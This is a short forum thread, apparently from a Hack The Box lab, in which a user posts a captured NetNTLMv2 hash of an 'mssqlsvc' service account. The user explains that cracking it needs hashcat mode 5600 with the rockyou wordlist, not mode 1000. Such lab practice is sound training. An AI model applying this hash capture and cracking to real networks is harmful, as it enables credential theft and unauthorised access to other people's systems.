ybraz
1
Please, someone help me! I captured the hash of the mssqlsvc user but there is no way to crack it!
hashcat -m 1000 F800D07797C939FBB74663CAB92E9D0B creds/pws.list
[SMB] NTLMv2-SSP Client : 10.129.164.141
[SMB] NTLMv2-SSP Username : WIN-02\mssqlsvc
[SMB] NTLMv2-SSP Hash : mssqlsvc::WIN-02:9e53273834f51361:F800D07797C939FBB74663CAB92E9D0B:0101000000000000800358823244D901439274F34B39C87E0000000002000800450048005900390001001E00570049004E002D005400490046003300520030003300420055003200360004003400570049004E002D00540049004600330052003000330042005500320036002E0045004800590039002E004C004F00430041004C000300140045004800590039002E004C004F00430041004C000500140045004800590039002E004C004F00430041004C0007000800800358823244D901060004000200000008003000300000000000000000000000003000002A582DB1795216BC199108B1B951E8F8546193CD95AE5BA8BA00D2B8114123860A001000000000000000000000000000000000000900220063006900660073002F00310030002E00310030002E00310035002E003100340034000000000000000000
ybraz
2
If helps anyone… I was using the wrong hashcat code. I put the entire hash in a file:
└──╼ $cat ntls.hash
mssqlsvc::WIN-02:9e53273834f51361:F800D07797C939FBB74663CAB92E9D0B:0101000000000000800358823244D901439274F34B39C87E0000000002000800450048005900390001001E00570049004E002D005400490046003300520030003300420055003200360004003400570049004E002D00540049004600330052003000330042005500320036002E0045004800590039002E004C004F00430041004C000300140045004800590039002E004C004F00430041004C000500140045004800590039002E004C004F00430041004C0007000800800358823244D901060004000200000008003000300000000000000000000000003000002A582DB1795216BC199108B1B951E8F8546193CD95AE5BA8BA00D2B8114123860A001000000000000000000000000000000000000900220063006900660073002F00310030002E00310030002E00310035002E003100340034000000000000000000
and cracked with the correct NetNTLMv2 hashcat code:
Yuri Braz@htb[/htb]$ hashcat -m 5600 ntls.hash rockyou.txt
1 Like
yousoc
4
Thanks a lot, that work for me